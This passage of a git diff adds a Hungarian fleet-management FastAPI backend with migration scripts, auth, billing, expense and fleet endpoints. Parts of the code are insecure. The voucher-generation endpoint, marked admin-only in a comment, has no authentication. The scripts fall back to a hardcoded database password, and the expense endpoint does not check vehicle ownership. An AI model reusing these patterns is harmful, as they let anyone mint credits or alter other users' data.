ALTER TABLE data.costs + ADD COLUMN IF NOT EXISTS document_url VARCHAR(255); + """)) + print("✅ KÉSZ! Mehetnek a fájlok.") + await engine.dispose() + +if __name__ == "__main__": + asyncio.run(add_doc_column()) \ No newline at end of file diff --git a/backend/_legacy_backup/update_invitations.py b/backend/_legacy_backup/update_invitations.py new file mode 100755 index 0000000..7efe4af --- /dev/null +++ b/backend/_legacy_backup/update_invitations.py @@ -0,0 +1,58 @@ +import asyncio +import os +from sqlalchemy.ext.asyncio import create_async_engine +from sqlalchemy import text +from dotenv import load_dotenv + +load_dotenv() + +raw_url = os.getenv("DATABASE_URL") +if not raw_url: + raw_url = "postgresql://admin:PASSWORD_111@postgres-db:5432/service_finder" +DATABASE_URL = raw_url.replace("postgresql://", "postgresql+asyncpg://").replace("/service_finder_db", "/service_finder") + +async def upgrade_invites(): + print(f"🔌 Kapcsolódás...") + engine = create_async_engine(DATABASE_URL) + + async with engine.begin() as conn: + print("📨 Invitations (Meghívók) tábla létrehozása...") + # Ez tárolja a függőben lévő meghívásokat + await conn.execute(text(""" + CREATE TABLE IF NOT EXISTS data.invitations ( + id SERIAL PRIMARY KEY, + email VARCHAR(255) NOT NULL, + inviter_id INTEGER REFERENCES data.users(id), -- Ki hívta meg? (Cég) + role VARCHAR(20) NOT NULL, -- Milyen szerepre? (MANAGER, DRIVER) + access_level VARCHAR(20) DEFAULT 'FULL', -- A/B Sofőr szint + token VARCHAR(100) UNIQUE NOT NULL, -- A titkos link kódja + status VARCHAR(20) DEFAULT 'PENDING', -- PENDING, ACCEPTED, EXPIRED + created_at TIMESTAMP DEFAULT NOW(), + expires_at TIMESTAMP + ); + """)) + + print("🤝 Fleet Members (Többcéges tagság) tábla létrehozása...") + # Ez teszi lehetővé, hogy valaki több céghez is tartozzon + await conn.execute(text(""" + CREATE TABLE IF NOT EXISTS data.fleet_members ( + id SERIAL PRIMARY KEY, + user_id INTEGER REFERENCES data.users(id), -- A Dolgozó + owner_id INTEGER REFERENCES data.users(id), -- A Cég / Tulajdonos + role VARCHAR(20) NOT NULL, -- FLEET_MANAGER, DRIVER + joined_at TIMESTAMP DEFAULT NOW(), + + -- Egy ember egy cégnél csak egyszer szerepelhet + UNIQUE(user_id, owner_id) + ); + """)) + + # Takarítás: A régi 'parent_id' már nem kell, mert a fleet_members kiváltja + # De biztonságból egyelőre csak NULL-ra állítjuk, nem töröljük az oszlopot + # await conn.execute(text("UPDATE data.users SET parent_id = NULL;")) + + print("✅ KÉSZ! A rendszer készen áll a biztonságos meghívókra.") + await engine.dispose() + +if __name__ == "__main__": + asyncio.run(upgrade_invites()) diff --git a/backend/_legacy_backup/update_permissions.py b/backend/_legacy_backup/update_permissions.py new file mode 100755 index 0000000..b47ffb7 --- /dev/null +++ b/backend/_legacy_backup/update_permissions.py @@ -0,0 +1,61 @@ +import asyncio +import os +from sqlalchemy.ext.asyncio import create_async_engine +from sqlalchemy import text +from dotenv import load_dotenv + +load_dotenv() + +raw_url = os.getenv("DATABASE_URL") +if not raw_url: + raw_url = "postgresql://admin:PASSWORD_111@postgres-db:5432/service_finder" +DATABASE_URL = raw_url.replace("postgresql://", "postgresql+asyncpg://").replace("/service_finder_db", "/service_finder") + +async def upgrade_permissions(): + print(f"🔌 Kapcsolódás...") + engine = create_async_engine(DATABASE_URL) + + async with engine.begin() as conn: + print("👑 USERS tábla bővítése (Rendszer és Szervezeti szintek)...") + + # 1. SYS_ROLE: Rendszergazda / Moderátor / User + await conn.execute(text(""" + ALTER TABLE data.users + ADD COLUMN IF NOT EXISTS sys_role VARCHAR(20) DEFAULT 'USER'; + """)) + + # 2. HIERARCHIA: Ki a főnököd? (Parent User ID) + # Ha NULL, akkor ő a Cégtulajdonos (SuperUser). Ha van ID, akkor Alkalmazott. + await conn.execute(text(""" + ALTER TABLE data.users + ADD COLUMN IF NOT EXISTS parent_id INTEGER REFERENCES data.users(id); + """)) + + # 3. ORG_ROLE: Cégen belüli szerep (Owner, Fleet Manager, Employee) + await conn.execute(text(""" + ALTER TABLE data.users + ADD COLUMN IF NOT EXISTS org_role VARCHAR(20) DEFAULT 'OWNER'; + """)) + + print("🚦 VEHICLE_HISTORY tábla bővítése (Sofőr jogosultságok)...") + + # 4. ACCESS_LEVEL: Mit láthat a sofőr? (COST_MANAGER vs LOG_ONLY) + await conn.execute(text(""" + ALTER TABLE data.vehicle_history + ADD COLUMN IF NOT EXISTS access_level VARCHAR(20) DEFAULT 'FULL'; + -- Lehetséges értékek: 'FULL', 'COST_MANAGER', 'LOG_ONLY' + """)) + + # --- DEMO ADATOK FRISSÍTÉSE --- + print("👤 Demo User (ID:1) kinevezése Rendszergazdának és Cégtulajdonosnak...") + await conn.execute(text(""" + UPDATE data.users + SET sys_role = 'SYS_ADMIN', org_role = 'OWNER', parent_id = NULL + WHERE id = 1; + """)) + + print("✅ KÉSZ! A jogosultsági mátrix beépítve az adatbázisba.") + await engine.dispose() + +if __name__ == "__main__": + asyncio.run(upgrade_permissions()) \ No newline at end of file diff --git a/backend/alembic.ini b/backend/alembic.ini new file mode 100755 index 0000000..6bd1c02 --- /dev/null +++ b/backend/alembic.ini @@ -0,0 +1,149 @@ +# A generic, single database configuration. + +[alembic] +# path to migration scripts. +# this is typically a path given in POSIX (e.g. forward slashes) +# format, relative to the token %(here)s which refers to the location of this +# ini file +script_location = %(here)s/migrations + +# template used to generate migration file names; The default value is %%(rev)s_%%(slug)s +# Uncomment the line below if you want the files to be prepended with date and time +# see https://alembic.sqlalchemy.org/en/latest/tutorial.html#editing-the-ini-file +# for all available tokens +# file_template = %%(year)d_%%(month).2d_%%(day).2d_%%(hour).2d%%(minute).2d-%%(rev)s_%%(slug)s +# Or organize into date-based subdirectories (requires recursive_version_locations = true) +# file_template = %%(year)d/%%(month).2d/%%(day).2d_%%(hour).2d%%(minute).2d_%%(second).2d_%%(rev)s_%%(slug)s + +# sys.path path, will be prepended to sys.path if present. +# defaults to the current working directory. for multiple paths, the path separator +# is defined by "path_separator" below. +prepend_sys_path = . + + +# timezone to use when rendering the date within the migration file +# as well as the filename. +# If specified, requires the tzdata library which can be installed by adding +# `alembic[tz]` to the pip requirements. +# string value is passed to ZoneInfo() +# leave blank for localtime +# timezone = + +# max length of characters to apply to the "slug" field +# truncate_slug_length = 40 + +# set to 'true' to run the environment during +# the 'revision' command, regardless of autogenerate +# revision_environment = false + +# set to 'true' to allow .pyc and .pyo files without +# a source .py file to be detected as revisions in the +# versions/ directory +# sourceless = false + +# version location specification; This defaults +# to /versions. When using multiple version +# directories, initial revisions must be specified with --version-path. +# The path separator used here should be the separator specified by "path_separator" +# below. +# version_locations = %(here)s/bar:%(here)s/bat:%(here)s/alembic/versions + +# path_separator; This indicates what character is used to split lists of file +# paths, including version_locations and prepend_sys_path within configparser +# files such as alembic.ini. +# The default rendered in new alembic.ini files is "os", which uses os.pathsep +# to provide os-dependent path splitting. +# +# Note that in order to support legacy alembic.ini files, this default does NOT +# take place if path_separator is not present in alembic.ini. If this +# option is omitted entirely, fallback logic is as follows: +# +# 1. Parsing of the version_locations option falls back to using the legacy +# "version_path_separator" key, which if absent then falls back to the legacy +# behavior of splitting on spaces and/or commas. +# 2. Parsing of the prepend_sys_path option falls back to the legacy +# behavior of splitting on spaces, commas, or colons. +# +# Valid values for path_separator are: +# +# path_separator = : +# path_separator = ; +# path_separator = space +# path_separator = newline +# +# Use os.pathsep. Default configuration used for new projects. +path_separator = os + +# set to 'true' to search source files recursively +# in each "version_locations" directory +# new in Alembic version 1.10 +# recursive_version_locations = false + +# the output encoding used when revision files +# are written from script.py.mako +# output_encoding = utf-8 + +# database URL. This is consumed by the user-maintained env.py script only. +# other means of configuring database URLs may be customized within the env.py +# file. +sqlalchemy.url = postgresql+asyncpg://user:pass@postgres-db:5432/service_finder + + +[post_write_hooks] +# post_write_hooks defines scripts or Python functions that are run +# on newly generated revision scripts. See the documentation for further +# detail and examples + +# format using "black" - use the console_scripts runner, against the "black" entrypoint +# hooks = black +# black.type = console_scripts +# black.entrypoint = black +# black.options = -l 79 REVISION_SCRIPT_FILENAME + +# lint with attempts to fix using "ruff" - use the module runner, against the "ruff" module +# hooks = ruff +# ruff.type = module +# ruff.module = ruff +# ruff.options = check --fix REVISION_SCRIPT_FILENAME + +# Alternatively, use the exec runner to execute a binary found on your PATH +# hooks = ruff +# ruff.type = exec +# ruff.executable = ruff +# ruff.options = check --fix REVISION_SCRIPT_FILENAME + +# Logging configuration. This is also consumed by the user-maintained +# env.py script only. +[loggers] +keys = root,sqlalchemy,alembic + +[handlers] +keys = console + +[formatters] +keys = generic + +[logger_root] +level = WARNING +handlers = console +qualname = + +[logger_sqlalchemy] +level = WARNING +handlers = +qualname = sqlalchemy.engine + +[logger_alembic] +level = INFO +handlers = +qualname = alembic + +[handler_console] +class = StreamHandler +args = (sys.stderr,) +level = NOTSET +formatter = generic + +[formatter_generic] +format = %(levelname)-5.5s [%(name)s] %(message)s +datefmt = %H:%M:%S diff --git a/backend/app/__init__.py b/backend/app/__init__.py new file mode 100755 index 0000000..e69de29 diff --git a/backend/app/__pycache__/__init__.cpython-312.pyc b/backend/app/__pycache__/__init__.cpython-312.pyc new file mode 100755 index 0000000..6e28a5f Binary files /dev/null and b/backend/app/__pycache__/__init__.cpython-312.pyc differ diff --git a/backend/app/__pycache__/main.cpython-312.pyc b/backend/app/__pycache__/main.cpython-312.pyc new file mode 100755 index 0000000..5b314fe Binary files /dev/null and b/backend/app/__pycache__/main.cpython-312.pyc differ diff --git a/backend/app/api/__pycache__/deps.cpython-312.pyc b/backend/app/api/__pycache__/deps.cpython-312.pyc new file mode 100755 index 0000000..9be3ecb Binary files /dev/null and b/backend/app/api/__pycache__/deps.cpython-312.pyc differ diff --git a/backend/app/api/auth.py b/backend/app/api/auth.py new file mode 100755 index 0000000..742eadc --- /dev/null +++ b/backend/app/api/auth.py @@ -0,0 +1,132 @@ +from datetime import timedelta +from typing import Dict, Any +from fastapi import APIRouter, HTTPException +from app.core.config import settings +from app.core.security import create_token, decode_token + +router = APIRouter(prefix="/auth", tags=["auth"]) + +@router.post("/login") +def login(payload: Dict[str, Any]): + """ + payload: + { + "org_id": "", + "login": "", + "password": "" + } + """ + from app.db.session import get_conn + + conn = get_conn() + try: + cur = conn.cursor() + cur.execute("BEGIN;") + + org_id = (payload.get("org_id") or "").strip() + login_id = (payload.get("login") or "").strip() + password = payload.get("password") or "" + + if not org_id or not login_id or not password: + raise HTTPException(status_code=400, detail="org_id, login, password required") + + # RLS miatt kötelező: org kontextus beállítás + cur.execute("SELECT set_config('app.tenant_org_id', %s, false);", (org_id,)) + + # account + credential + cur.execute( + """ + SELECT + a.account_id::text, + a.org_id::text, + a.username::text, + a.email::text, + c.password_hash, + c.is_active + FROM app.account a + JOIN app.account_credential c ON c.account_id = a.account_id + WHERE a.org_id = %s::uuid + AND (a.username = %s::citext OR a.email = %s::citext) + AND c.is_active = true + LIMIT 1; + """, + (org_id, login_id, login_id), + ) + + row = cur.fetchone() + if not row: + raise HTTPException(status_code=401, detail="Invalid credentials") + + account_id, org_id_db, username, email, password_hash, cred_active = row + + # Jelszó ellenőrzés pgcrypto-val: crypt(plain, stored_hash) = stored_hash + cur.execute("SELECT crypt(%s, %s) = %s;", (password, password_hash, password_hash)) + ok = cur.fetchone()[0] + if not ok: + raise HTTPException(status_code=401, detail="Invalid credentials") + + # MVP: role később membershipből; most fixen tenant_admin + role_code = "tenant_admin" + is_platform_admin = False + + access = create_token( + { + "sub": account_id, + "org_id": org_id_db, + "role": role_code, + "is_platform_admin": is_platform_admin, + "type": "access", + }, + settings.JWT_SECRET, + timedelta(minutes=settings.JWT_ACCESS_MINUTES), + ) + + refresh = create_token( + { + "sub": account_id, + "org_id": org_id_db, + "role": role_code, + "is_platform_admin": is_platform_admin, + "type": "refresh", + }, + settings.JWT_SECRET, + timedelta(days=settings.JWT_REFRESH_DAYS), + ) + + conn.commit() + return {"access_token": access, "refresh_token": refresh, "token_type": "bearer"} + except HTTPException: + conn.rollback() + raise + except Exception as e: + conn.rollback() + raise HTTPException(status_code=500, detail=str(e)) + finally: + conn.close() + + +@router.post("/refresh") +def refresh_token(payload: Dict[str, Any]): + token = payload.get("refresh_token") or "" + if not token: + raise HTTPException(status_code=400, detail="refresh_token required") + + try: + claims = decode_token(token, settings.JWT_SECRET) + if claims.get("type") != "refresh": + raise HTTPException(status_code=401, detail="Invalid refresh token type") + + access = create_token( + { + "sub": claims.get("sub"), + "org_id": claims.get("org_id"), + "role": claims.get("role"), + "is_platform_admin": claims.get("is_platform_admin", False), + "type": "access", + }, + settings.JWT_SECRET, + timedelta(minutes=settings.JWT_ACCESS_MINUTES), + ) + return {"access_token": access, "token_type": "bearer"} + except Exception: + raise HTTPException(status_code=401, detail="Invalid or expired refresh token") diff --git a/backend/app/api/deps.py b/backend/app/api/deps.py new file mode 100755 index 0000000..3eed9e3 --- /dev/null +++ b/backend/app/api/deps.py @@ -0,0 +1,39 @@ +from typing import Generator +from fastapi import Depends, HTTPException, status +from fastapi.security import OAuth2PasswordBearer +from jose import JWTError +from sqlalchemy.ext.asyncio import AsyncSession +from sqlalchemy import select + +from app.db.session import SessionLocal +from app.core.security import decode_token +from app.models.user import User + +reusable_oauth2 = OAuth2PasswordBearer(tokenUrl="/api/v2/auth/login") + +async def get_db() -> Generator: + async with SessionLocal() as session: + yield session + +async def get_current_user( + db: AsyncSession = Depends(get_db), + token: str = Depends(reusable_oauth2), +) -> User: + try: + payload = decode_token(token) + user_id = payload.get("sub") + if not user_id: + raise HTTPException(status_code=status.HTTP_401_UNAUTHORIZED, detail="Token error") + except JWTError: + raise HTTPException(status_code=status.HTTP_401_UNAUTHORIZED, detail="Invalid token") + + res = await db.execute(select(User).where(User.id == int(user_id))) + user = res.scalars().first() + + if not user: + raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail="User not found") + + if not user.is_active: + raise HTTPException(status_code=status.HTTP_403_FORBIDDEN, detail="Fiók nem aktív.") + + return user diff --git a/backend/app/api/recommend.py b/backend/app/api/recommend.py new file mode 100755 index 0000000..9119555 --- /dev/null +++ b/backend/app/api/recommend.py @@ -0,0 +1,14 @@ +from fastapi import APIRouter, Request + +router = APIRouter() + +@router.get("/provider/inbox") +def provider_inbox(request: Request, provider_id: str): + cur = request.state.db.cursor() + cur.execute(""" + SELECT * FROM app.v_provider_inbox + WHERE provider_listing_id = %s + ORDER BY created_at DESC + """, (provider_id,)) + rows = cur.fetchall() + return rows diff --git a/backend/app/api/v1/__pycache__/api.cpython-312.pyc b/backend/app/api/v1/__pycache__/api.cpython-312.pyc new file mode 100755 index 0000000..48aecee Binary files /dev/null and b/backend/app/api/v1/__pycache__/api.cpython-312.pyc differ diff --git a/backend/app/api/v1/api.py b/backend/app/api/v1/api.py new file mode 100755 index 0000000..10d663f --- /dev/null +++ b/backend/app/api/v1/api.py @@ -0,0 +1,12 @@ +from fastapi import APIRouter +from app.api.v1.endpoints import auth, users, vehicles, billing, fleet, expenses, reports + +api_router = APIRouter() + +api_router.include_router(auth.router, prefix="/auth", tags=["auth"]) +api_router.include_router(users.router, prefix="/users", tags=["users"]) +api_router.include_router(billing.router, prefix="/billing", tags=["billing"]) +api_router.include_router(vehicles.router, prefix="/vehicles", tags=["vehicles"]) +api_router.include_router(fleet.router, prefix="/fleet", tags=["fleet"]) +api_router.include_router(expenses.router, prefix="/expenses", tags=["expenses"]) +api_router.include_router(reports.router, prefix="/reports", tags=["reports"]) \ No newline at end of file diff --git a/backend/app/api/v1/endpoints/__pycache__/auth.cpython-312.pyc b/backend/app/api/v1/endpoints/__pycache__/auth.cpython-312.pyc new file mode 100755 index 0000000..07ce30e Binary files /dev/null and b/backend/app/api/v1/endpoints/__pycache__/auth.cpython-312.pyc differ diff --git a/backend/app/api/v1/endpoints/__pycache__/billing.cpython-312.pyc b/backend/app/api/v1/endpoints/__pycache__/billing.cpython-312.pyc new file mode 100755 index 0000000..8985571 Binary files /dev/null and b/backend/app/api/v1/endpoints/__pycache__/billing.cpython-312.pyc differ diff --git a/backend/app/api/v1/endpoints/__pycache__/expenses.cpython-312.pyc b/backend/app/api/v1/endpoints/__pycache__/expenses.cpython-312.pyc new file mode 100755 index 0000000..89a9077 Binary files /dev/null and b/backend/app/api/v1/endpoints/__pycache__/expenses.cpython-312.pyc differ diff --git a/backend/app/api/v1/endpoints/__pycache__/fleet.cpython-312.pyc b/backend/app/api/v1/endpoints/__pycache__/fleet.cpython-312.pyc new file mode 100755 index 0000000..77c4845 Binary files /dev/null and b/backend/app/api/v1/endpoints/__pycache__/fleet.cpython-312.pyc differ diff --git a/backend/app/api/v1/endpoints/__pycache__/reports.cpython-312.pyc b/backend/app/api/v1/endpoints/__pycache__/reports.cpython-312.pyc new file mode 100755 index 0000000..99b5547 Binary files /dev/null and b/backend/app/api/v1/endpoints/__pycache__/reports.cpython-312.pyc differ diff --git a/backend/app/api/v1/endpoints/__pycache__/users.cpython-312.pyc b/backend/app/api/v1/endpoints/__pycache__/users.cpython-312.pyc new file mode 100755 index 0000000..7e8c21a Binary files /dev/null and b/backend/app/api/v1/endpoints/__pycache__/users.cpython-312.pyc differ diff --git a/backend/app/api/v1/endpoints/__pycache__/vehicles.cpython-312.pyc b/backend/app/api/v1/endpoints/__pycache__/vehicles.cpython-312.pyc new file mode 100755 index 0000000..9804fe5 Binary files /dev/null and b/backend/app/api/v1/endpoints/__pycache__/vehicles.cpython-312.pyc differ diff --git a/backend/app/api/v1/endpoints/admin.py b/backend/app/api/v1/endpoints/admin.py new file mode 100755 index 0000000..987241f --- /dev/null +++ b/backend/app/api/v1/endpoints/admin.py @@ -0,0 +1,79 @@ +from fastapi import APIRouter, Depends, HTTPException, status +from sqlalchemy.ext.asyncio import AsyncSession +from sqlalchemy import select +from typing import List + +from app.db.session import get_db +from app.api import deps +from app.models.user import User, UserRole +from app.models.system_settings import SystemSetting # ÚJ import +from app.models.gamification import PointRule, LevelConfig, RegionalSetting +from app.models.translation import Translation +from app.services.translation_service import TranslationService + +router = APIRouter() + +def check_admin_access(current_user: User, required_roles: List[UserRole]): + if current_user.role not in required_roles: + raise HTTPException( + status_code=status.HTTP_403_FORBIDDEN, + detail="Nincs jogosultságod ehhez a művelethez." + ) + +# --- ⚙️ ÚJ: DINAMIKUS RENDSZERBEÁLLÍTÁSOK (Pl. Jármű limit) --- + +@router.get("/settings", response_model=List[dict]) +async def get_all_system_settings( + db: AsyncSession = Depends(get_db), + current_user: User = Depends(deps.get_current_user) +): + """Az összes globális rendszerbeállítás listázása.""" + check_admin_access(current_user, [UserRole.SUPERUSER]) + result = await db.execute(select(SystemSetting)) + settings = result.scalars().all() + return [{"key": s.key, "value": s.value, "description": s.description} for s in settings] + +@router.put("/settings/{key}") +async def update_system_setting( + key: str, + new_value: int, # Később lehet JSON is, ha komplexebb a beállítás + db: AsyncSession = Depends(get_db), + current_user: User = Depends(deps.get_current_user) +): + """Egy adott beállítás (pl. FREE_VEHICLE_LIMIT) módosítása.""" + check_admin_access(current_user, [UserRole.SUPERUSER]) + + result = await db.execute(select(SystemSetting).where(SystemSetting.key == key)) + setting = result.scalar_one_or_none() + + if not setting: + raise HTTPException(status_code=404, detail="Beállítás nem található") + + setting.value = new_value + await db.commit() + return {"status": "success", "key": key, "new_value": new_value} + + +# --- 🌍 FORDÍTÁSOK KEZELÉSE (Meglévő kódod) --- + +@router.post("/translations", status_code=status.HTTP_201_CREATED) +async def add_translation_draft( + key: str, lang: str, value: str, + db: AsyncSession = Depends(get_db), + current_user: User = Depends(deps.get_current_user) +): + check_admin_access(current_user, [UserRole.SUPERUSER, UserRole.REGIONAL_ADMIN]) + new_t = Translation(key=key, lang_code=lang, value=value, is_published=False) + db.add(new_t) + await db.commit() + return {"message": "Fordítás piszkozatként mentve. Ne felejtsd el publikálni!"} + +@router.post("/translations/publish") +async def publish_translations( + db: AsyncSession = Depends(get_db), + current_user: User = Depends(deps.get_current_user) +): + check_admin_access(current_user, [UserRole.SUPERUSER, UserRole.REGIONAL_ADMIN]) + await TranslationService.publish_all(db) + return {"message": "Sikeres publikálás! A változások minden szerveren élesedtek."} + \ No newline at end of file diff --git a/backend/app/api/v1/endpoints/auth.py b/backend/app/api/v1/endpoints/auth.py new file mode 100755 index 0000000..565aa85 --- /dev/null +++ b/backend/app/api/v1/endpoints/auth.py @@ -0,0 +1,91 @@ +from fastapi import APIRouter, Depends, HTTPException, Request +from sqlalchemy.ext.asyncio import AsyncSession +from sqlalchemy import select, text +from datetime import datetime, timedelta +import hashlib, secrets + +from app.db.session import get_db +from app.models.user import User +from app.core.security import get_password_hash +from app.services.email_manager import email_manager +from app.services.config_service import config + +router = APIRouter() + +@router.post("/register") +async def register( + request: Request, + email: str, + password: str, + first_name: str, + last_name: str, + db: AsyncSession = Depends(get_db) +): + ip = request.client.host + + # 1. BOT-VÉDELEM + throttle_min = await config.get_setting('registration_throttle_minutes', default=10) + check_throttle = await db.execute(text(""" + SELECT count(*) FROM data.audit_logs + WHERE ip_address = :ip AND action = 'USER_REGISTERED' AND created_at > :t + """), {'ip': ip, 't': datetime.utcnow() - timedelta(minutes=int(throttle_min))}) + + if check_throttle.scalar() > 0: + raise HTTPException(status_code=429, detail="Túl sok próbálkozás. Várj pár percet!") + + # 2. REGISZTRÁCIÓ + res = await db.execute(select(User).where(User.email == email)) + if res.scalars().first(): + raise HTTPException(status_code=400, detail="Ez az email már foglalt.") + + new_user = User( + email=email, + hashed_password=get_password_hash(password), + first_name=first_name, + last_name=last_name, + is_active=False + ) + db.add(new_user) + await db.flush() + + # 3. TOKEN & LOG + raw_token = secrets.token_urlsafe(48) + token_hash = hashlib.sha256(raw_token.encode()).hexdigest() + await db.execute(text(""" + INSERT INTO data.verification_tokens (user_id, token_hash, token_type, expires_at) + VALUES (:u, :t, 'email_verify', :e) + """), {'u': new_user.id, 't': token_hash, 'e': datetime.utcnow() + timedelta(days=2)}) + + await db.execute(text(""" + INSERT INTO data.audit_logs (user_id, action, endpoint, method, ip_address) + VALUES (:u, 'USER_REGISTERED', '/register', 'POST', :ip) + """), {'u': new_user.id, 'ip': ip}) + + # 4. EMAIL KÜLDÉS + verify_link = f"http://{request.headers.get('host')}/api/v1/auth/verify?token={raw_token}" + email_body = f"

Szia {first_name}!

Aktiváld a fiókod: {verify_link}

" + + await email_manager.send_email( + recipient=email, + subject="Regisztráció megerősítése", + body=email_body, + email_type="registration", + user_id=new_user.id + ) + + await db.commit() + return {"message": "Sikeres regisztráció! Ellenőrizd az email fiókodat."} + +@router.get("/verify") +async def verify_account(token: str, db: AsyncSession = Depends(get_db)): + token_hash = hashlib.sha256(token.encode()).hexdigest() + query = text("SELECT user_id FROM data.verification_tokens WHERE token_hash = :t AND is_used = False") + res = await db.execute(query, {'t': token_hash}) + row = res.fetchone() + if not row: + raise HTTPException(status_code=400, detail="Érvénytelen aktiváló link") + + await db.execute(text("UPDATE data.users SET is_active = True WHERE id = :id"), {'id': row[0]}) + await db.execute(text("UPDATE data.verification_tokens SET is_used = True WHERE token_hash = :t"), {'t': token_hash}) + await db.commit() + return {"message": "Fiók aktiválva!"} diff --git a/backend/app/api/v1/endpoints/billing.py b/backend/app/api/v1/endpoints/billing.py new file mode 100755 index 0000000..03d8ae0 --- /dev/null +++ b/backend/app/api/v1/endpoints/billing.py @@ -0,0 +1,125 @@ +from fastapi import APIRouter, Depends, HTTPException, Query +from sqlalchemy.ext.asyncio import AsyncSession +from sqlalchemy import text +from app.api.deps import get_db, get_current_user +from typing import List, Dict +import secrets + +router = APIRouter() + +# 1. EGYENLEG LEKÉRDEZÉSE (A felhasználó Széfjéhez kötve) +@router.get("/balance") +async def get_balance(db: AsyncSession = Depends(get_db), current_user = Depends(get_current_user)): + """ + Visszaadja a felhasználó aktuális kreditegyenlegét és a Széfje (Cége) nevét. + """ + query = text(""" + SELECT + uc.balance, + c.name as company_name + FROM data.user_credits uc + JOIN data.companies c ON uc.user_id = c.owner_id + WHERE uc.user_id = :user_id + LIMIT 1 + """) + result = await db.execute(query, {"user_id": current_user.id}) + row = result.fetchone() + + if not row: + return { + "company_name": "Privát Széf", + "balance": 0.0, + "currency": "Credit" + } + + return { + "company_name": row.company_name, + "balance": float(row.balance), + "currency": "Credit" + } + +# 2. TRANZAKCIÓS ELŐZMÉNYEK +@router.get("/history") +async def get_history(db: AsyncSession = Depends(get_db), current_user = Depends(get_current_user)): + """ + Kilistázza a kreditmozgásokat (bevételek, költések, voucherek). + """ + query = text(""" + SELECT amount, reason, created_at + FROM data.credit_transactions + WHERE user_id = :user_id + ORDER BY created_at DESC + """) + result = await db.execute(query, {"user_id": current_user.id}) + return [dict(row._mapping) for row in result.fetchall()] + +# 3. VOUCHER BEVÁLTÁS (A rendszer gazdaságának motorja) +@router.post("/vouchers/redeem") +async def redeem_voucher(code: str, db: AsyncSession = Depends(get_db), current_user = Depends(get_current_user)): + """ + Bevált egy kódot, és jóváírja az értékét a felhasználó egyenlegén. + """ + # 1. Voucher ellenőrzése + check_query = text(""" + SELECT id, value, is_used, expires_at + FROM data.vouchers + WHERE code = :code AND is_used = False AND (expires_at > now() OR expires_at IS NULL) + """) + res = await db.execute(check_query, {"code": code.strip().upper()}) + voucher = res.fetchone() + + if not voucher: + raise HTTPException(status_code=400, detail="Érvénytelen, lejárt vagy már felhasznált kód.") + + # 2. Egyenleg frissítése (vagy létrehozása, ha még nincs sor a user_credits-ben) + update_balance = text(""" + INSERT INTO data.user_credits (user_id, balance) + VALUES (:u, :v) + ON CONFLICT (user_id) DO UPDATE SET balance = data.user_credits.balance + :v + """) + await db.execute(update_balance, {"u": current_user.id, "v": voucher.value}) + + # 3. Tranzakció naplózása + log_transaction = text(""" + INSERT INTO data.credit_transactions (user_id, amount, reason) + VALUES (:u, :v, :r) + """) + await db.execute(log_transaction, { + "u": current_user.id, + "v": voucher.value, + "r": f"Voucher beváltva: {code}" + }) + + # 4. Voucher megjelölése felhasználtként + await db.execute(text(""" + UPDATE data.vouchers + SET is_used = True, used_by = :u, used_at = now() + WHERE id = :vid + """), {"u": current_user.id, "vid": voucher.id}) + + await db.commit() + return {"status": "success", "added_value": float(voucher.value), "message": "Kredit jóváírva!"} + +# 4. ADMIN: VOUCHER GENERÁLÁS (Csak Neked) +@router.post("/vouchers/generate", include_in_schema=True) +async def generate_vouchers( + count: int = 1, + value: float = 500.0, + batch_name: str = "ADMIN_GEN", + db: AsyncSession = Depends(get_db) +): + """ + Tömeges voucher generálás az admin felületről. + """ + generated_codes = [] + for _ in range(count): + # Generálunk egy SF-XXXX-XXXX formátumú kódot + code = f"SF-{secrets.token_hex(3).upper()}-{secrets.token_hex(3).upper()}" + await db.execute(text(""" + INSERT INTO data.vouchers (code, value, batch_id, expires_at) + VALUES (:c, :v, :b, now() + interval '90 days') + """), {"c": code, "v": value, "b": batch_name}) + generated_codes.append(code) + + await db.commit() + return {"batch": batch_name, "count": count, "codes": generated_codes} \ No newline at end of file diff --git a/backend/app/api/v1/endpoints/expenses.py b/backend/app/api/v1/endpoints/expenses.py new file mode 100755 index 0000000..dc78214 --- /dev/null +++ b/backend/app/api/v1/endpoints/expenses.py @@ -0,0 +1,51 @@ +from fastapi import APIRouter, Depends, HTTPException +from sqlalchemy.ext.asyncio import AsyncSession +from sqlalchemy import text +from app.api.deps import get_db, get_current_user +from pydantic import BaseModel +from datetime import date +from typing import Optional + +router = APIRouter() + +class ExpenseCreate(BaseModel): + vehicle_id: str + category: str # Pl: REFUELING, SERVICE, INSURANCE + amount: float + date: date + odometer_value: Optional[float] = None + description: Optional[str] = None + +@router.post("/add") +async def add_expense( + expense: ExpenseCreate, + db: AsyncSession = Depends(get_db), + current_user = Depends(get_current_user) +): + """ + Új költség rögzítése egy járműhöz. + """ + # 1. Ellenőrizzük, hogy a jármű létezik-e + query = text("SELECT id FROM data.vehicles WHERE id = :v_id") + res = await db.execute(query, {"v_id": expense.vehicle_id}) + if not res.fetchone(): + raise HTTPException(status_code=404, detail="Jármű nem található.") + + # 2. Beszúrás a vehicle_expenses táblába + insert_query = text(""" + INSERT INTO data.vehicle_expenses + (vehicle_id, category, amount, date, odometer_value, description) + VALUES (:v_id, :cat, :amt, :date, :odo, :desc) + """) + + await db.execute(insert_query, { + "v_id": expense.vehicle_id, + "cat": expense.category, + "amt": expense.amount, + "date": expense.date, + "odo": expense.odometer_value, + "desc": expense.description + }) + + await db.commit() + return {"status": "success", "message": "Költség rögzítve."} \ No newline at end of file diff --git a/backend/app/api/v1/endpoints/fleet.py b/backend/app/api/v1/endpoints/fleet.py new file mode 100755 index 0000000..d9ef62e --- /dev/null +++ b/backend/app/api/v1/endpoints/fleet.py @@ -0,0 +1,46 @@ +from fastapi import APIRouter, Depends, HTTPException +from sqlalchemy.ext.asyncio import AsyncSession +from sqlalchemy import select, text +from app.api.deps import get_db, get_current_user +from app.models.vehicle import Vehicle +from app.models.company import CompanyMember + +router = APIRouter() + +@router.get("/vehicles") +async def get_my_vehicles(db: AsyncSession = Depends(get_db), current_user = Depends(get_current_user)): + # Megkeressük a cégeket (széfeket), amikhez a felhasználónak köze van + company_query = select(CompanyMember.company_id).where(CompanyMember.user_id == current_user.id) + company_res = await db.execute(company_query) + company_ids = company_res.scalars().all() + + if not company_ids: + return [] + + # Lekérjük az összes járművet, ami ezekhez a cégekhez tartozik + query = select(Vehicle).where(Vehicle.current_company_id.in_(company_ids)) + result = await db.execute(query) + return result.scalars().all() + +@router.post("/vehicles") +async def add_vehicle(vehicle_in: dict, db: AsyncSession = Depends(get_db), current_user = Depends(get_current_user)): + # Itt a meglévő logika fut tovább, de a Vehicle-t a user alapértelmezett cégéhez kötjük + 